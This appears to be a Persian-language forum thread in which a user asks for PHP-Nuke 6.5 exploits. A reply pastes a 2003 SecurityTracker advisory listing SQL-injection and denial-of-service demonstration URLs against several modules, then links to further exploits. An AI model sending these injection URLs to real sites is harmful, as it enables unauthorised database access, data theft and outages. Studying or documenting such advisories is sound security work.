exploites

salam khili vagteh donbale php-nuk exploit hastam vali baray 6.5 nist inaro peyda kardam zaheran khodesh gofteh ro 6.5 ham kar mikoneh....ageh kesi chizi dareh be ma ham begeh ... az doost khobemoon ke dafeh pish chand ta moarefi kard mamnoonam vali ona ro 6.5 kar nemikonan ..:) PHP-Nuke Input Validation Flaws in Several Modules (Sections, AvantGo, Surveys, Downloads, Reviews, Web_Links) Let Remote Users Inject SQL Commands SecurityTracker Alert ID: 1006793 CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site) Date: May 18 2003 Impact: Denial of service via network, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network Exploit Included: Yes Advisory: NovaPPC Security Research Group Version(s): 5.5, 6.0, 6.5 Description: Lorenzo Manuel Hernandez Garcia-Hierro of NovaPPC reported several vulnerabilities in PHP-Nuke. A remote user can inject SQL commands to view or modify the underlying database. A remote user can also cause the database server to become unstable. It is reported that a remote user can create a specially crafted URL to inject SQL commands to be executed by the underlying database. The following variables are affected:'secid' variable of the Sections module'sid' variable of the AvantGo module'pollID' variable of the Surveys module'cid' variable of the Downloads module'id' variable of the Reviews module'cid' variable of the Web_Links moduleSome demonstration exploit URLs are provided:http://[target]/modules.php?name=Sections op=listarticles secid=`[YOUR QUERY]http://[target]/modules.php?name=Sections op=viewarticle artid=`[YOUR QUERY]http://[target]/modules.php?name=Sections op=printpage artid==`[YOUR QUERY]http://[target]/modules.php?name=AvantGo file=print sid=`[YOUR QUERY]http://[target]/modules.php?name=Surveys pollID=`[YOUR QUERY]http://[target]/modules.php?name=Surveys op=results pollID=`[YOUR QUERY] mode= order=0 thold=0http://[target]/modules.php?name=Downloads d_op=viewdownload cid=` [YOUR QUERY]http://[target]/modules.php?name=Downloads d_op=viewdownload cid=`[YOUR QUERY] orderby=titleDhttp://[target]/modules.php?name=Reviews rop=showcontent id=` [YOUR QUERY]http://[target]/modules.php?name=Web_Links l_op=viewlink cid=`[YOUR QUERY]http://[target]/modules.php?name=Web_Links l_op=MostPopular ratenu m=`[YOUR QUERY] ratetype=numIt is also reported that a remote user can cause the target database server to become unstable. To trigger the flaw, a remote user can send a large file rating that exceeds the number of characters permitted in the relevant database field. A demonstration exploit URL is provided:http://[target]/modules.php?name=Downloads ratinglid=[FILE TO RATE] ratinguser=? ratinghost_name=? rating=99999999999 99999999 99999999999999999999999999999999999999999999999999 99The same type of URL can be used to inject SQL commands, as shown in the following demonstration exploit URL:http://[target]/modules.php?name=Downloads ratinglid=[FILE TO RATE] ratinguser=? ratinghost_name=? rating=`[HERE GOES SQL QUERY]The 'cid' variable of the Web_Links module is also vulnerable to a denial of service attack via the 'rating' field. A demonstration exploit URL is provided:http://[target]/modules.php?name=Web_Links ratinglid=96 ratinguser =? ratinghost_name=? rating=9999999999999999999999 9 9999999999 Impact: A remote user can gain access to the PHP-Nuke database to view private information and modify content. Solution: No solution was available at the time of this entry. Vendor URL: www.phpnuke.org/ (Links to External Site) Cause: Input validation error Underlying OS: Linux (Any), UNIX (Any), Windows (Any) Reported By: Lorenzo Hernandez Garcia-Hierro novappc@novappc.com Message History: None. :Din chiziye shayad be dardet bokhore.vali khoda vakili too in site ke linkesho behet midam har noe vulnerability ke bekhay hastesh in male khode phpNukehttp://www.securityfocus.com/bid/7191/exploit/;)khili mamnoon ! god jan (fekr mikonam esmetoon meysam basheh) be har khili chiz hay bahali toosh peyda kardam !;)